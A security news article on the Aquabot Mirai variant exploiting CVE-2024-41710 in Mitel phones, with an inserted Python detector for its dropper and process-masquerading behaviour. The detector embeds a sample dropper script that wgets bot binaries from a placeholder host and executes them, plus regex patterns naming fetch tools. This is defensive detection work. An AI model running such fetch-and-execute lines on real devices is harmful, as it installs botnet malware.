New Aquabot Botnet Exploits CVE-2024-41710 in Mitel Telephones for DDoS Attacks

A Mirai botnet variant dubbed Aquabot has been observed actively attempting to exploit a medium-severity security flaw impacting Mitel phones in order to ensnare them into a network capable of mounting distributed denial-of-service (DDoS) attacks.

The vulnerability in question is CVE-2024-41710 (CVSS score: 6.8), a case of command injection in the boot process that could allow a malicious actor to execute arbitrary commands within the context of the phone.

It impacts Mitel 6800 Series, 6900 Series, 6900w Series SIP Phones, and the Mitel 6970 Conference Unit. It was addressed by Mitel in mid-July 2024. A proof-of-concept (PoC) exploit for the flaw became publicly available in August.

Outside of CVE-2024-41710, some of the other vulnerabilities targeted by the botnet include CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution flaw targeting Linksys E-series devices.

“Aquabot is a botnet that was built off the Mirai framework with the ultimate goal of distributed denial-of-service (DDoS),” Akamai researchers Kyle Lefton and Larry Cashdollar said. “It has been known since November 2023.”

The web infrastructure company said it detected active exploitation attempts against CVE-2024-41710 since early January 2025, with the attacks mirroring a “payload almost identical to the PoC” to deploy the botnet malware.

The attack involves executing a shell script that, in turn, uses the “wget” command to retrieve Aquabot for different CPU architectures.

The Aquabot Mirai variant observed in the attack has been assessed to be a third iteration of the malware, sporting a novel “report_kill” function that reports back to the command-and-control (C2) server when a kill signal is caught on the infected device. However, sending this information hasn't been found to elicit any response from the server so far.

This new version, besides triggering C2 communication upon detecting certain signals, renames itself to “httpd.x86” to avoid attracting attention and is programmed to terminate processes that match certain requirements, such as local shells. It's suspected that the signal handling features are likely incorporated to craft more stealthy variants or detect malicious activity from competing botnets.
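The two behaviours the article describes, a dropper shell script that uses wget to fetch one bot binary per CPU architecture, and a running process that calls itself “httpd.x86” while executing from a throwaway directory, both lend themselves to simple host-side checks. The Python below is an added example and is not code from Akamai, Mitel or the article. The dropper script, the benign script, the process table and the hostname (a reserved `.invalid` placeholder) are constructed samples, and the list of architecture suffixes is an assumption based on common multi-architecture naming, not indicators taken from the report.

```python
"""Host-side checks for the two Aquabot behaviours described in the article
(added example; not Akamai's, Mitel's or the article's code). All sample
data in this file is constructed for the example."""
import re

# --- Check 1: dropper script that fetches a binary per architecture ---------

# Fetch commands commonly used by IoT droppers; a match stops at a command separator.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b[^;\n|&]*")
# Architecture suffixes as they appear in multi-arch bot file names (assumed list).
ARCH_TOKENS = ("x86_64", "x86", "i686", "i586", "arm7", "arm6", "arm5", "arm",
               "mipsel", "mpsl", "mips", "ppc", "sh4", "m68k", "spc")
# "chmod +x FILE; ./FILE": the backreference ties the chmod target to the executed file.
EXEC_RE = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})\s+(\S+)\s*;\s*\./\1\b")
# Staging in a world-writable or tmpfs directory before downloading.
STAGING_RE = re.compile(r"\bcd\s+/(?:tmp|var/run|var/tmp|dev/shm|mnt)\b")

# Constructed dropper-style script; the hostname is a reserved placeholder.
SAMPLE_DROPPER = """\
cd /tmp || cd /var/run || cd /mnt
wget http://malware-host.invalid/bins/bot.x86 -O x86; chmod +x x86; ./x86
wget http://malware-host.invalid/bins/bot.arm7 -O arm7; chmod +x arm7; ./arm7
wget http://malware-host.invalid/bins/bot.mips -O mips; chmod +x mips; ./mips
rm -rf x86 arm7 mips
"""

# Constructed benign script for contrast: one download, no execution.
SAMPLE_BENIGN = """\
wget https://example.com/firmware/update.tar.gz -O /tmp/update.tar.gz
tar -xzf /tmp/update.tar.gz -C /opt/firmware
"""


def analyze_dropper(script: str) -> dict:
    """Score a shell script for the multi-architecture fetch-and-execute pattern."""
    fetches = FETCH_RE.findall(script)
    archs = set()
    for fetch in fetches:
        for tok in ARCH_TOKENS:
            # Token must be a file-name component ("bot.x86", "/x86"), not a substring.
            if re.search(rf"[./_-]{re.escape(tok)}(?=[\s.;]|$)", fetch):
                archs.add(tok)
    execs = EXEC_RE.findall(script)
    staging = bool(STAGING_RE.search(script))
    # Verdict: several fetches, for at least two architectures, followed by execution.
    dropper_like = len(fetches) >= 2 and len(archs) >= 2 and len(execs) >= 1
    return {
        "fetches": len(fetches),
        "architectures": sorted(archs),
        "fetch_then_exec": len(execs),
        "writable_staging_dir": staging,
        "dropper_like": dropper_like,
    }


# --- Check 2: process masquerading as the web server ------------------------

TRUSTED_BIN_DIRS = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/",
                    "/usr/local/sbin/", "/usr/local/bin/")
VOLATILE_DIRS = ("/tmp/", "/var/run/", "/var/tmp/", "/dev/shm/", "/mnt/")

# Constructed process table: (pid, comm, resolved exe path) as one would read
# from /proc/<pid>/comm and readlink /proc/<pid>/exe on a Linux device.
SAMPLE_PROCS = [
    (811, "httpd", "/usr/sbin/httpd"),
    (1201, "httpd.x86", "/tmp/x86 (deleted)"),
    (1340, "httpd.x86", "/var/run/x86"),
    (1422, "sh", "/bin/sh"),
]


def masquerading_processes(procs):
    """Return processes whose name mimics httpd but whose binary was deleted,
    runs from a volatile directory, or lies outside the trusted bin dirs."""
    flagged = []
    for pid, comm, exe in procs:
        if not comm.startswith("httpd"):
            continue
        deleted = exe.endswith(" (deleted)")
        path = exe[: -len(" (deleted)")] if deleted else exe
        if deleted or path.startswith(VOLATILE_DIRS) or not path.startswith(TRUSTED_BIN_DIRS):
            flagged.append((pid, comm, exe))
    return flagged


if __name__ == "__main__":
    print("dropper sample:", analyze_dropper(SAMPLE_DROPPER))
    print("benign sample: ", analyze_dropper(SAMPLE_BENIGN))
    print("masquerading:  ", masquerading_processes(SAMPLE_PROCS))
```

On a live device the inputs would be the contents of any script found in a staging directory and the `/proc/<pid>/comm` plus `readlink /proc/<pid>/exe` pairs for each running process; the backreference in `EXEC_RE` deliberately requires the executed file to be the one just made executable, which keeps ordinary package or firmware update scripts from tripping the check.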

There is some evidence suggesting that the threat actors behind Aquabot are offering the network of compromised hosts as a DDoS service on Telegram under the monikers Cursinq Firewall, The Eye Services, and The Eye Botnet.

The development is a sign that Mirai continues to plague a range of internet-connected devices that often lack proper security features, or have either reached end-of-life or are left accessible with default configuration and passwords, making them low-hanging fruit ripe for exploitation and a key conduit for DDoS attacks.

“Threat actors commonly claim that the botnet is used only for DDoS mitigation testing purposes to try to mislead researchers or law enforcement,” the researchers said.

“Threat actors will claim it is just a PoC or something educational, but a deeper analysis shows that they are in fact advertising DDoS as a service, or the owners are boasting about running their own botnet on Telegram.”
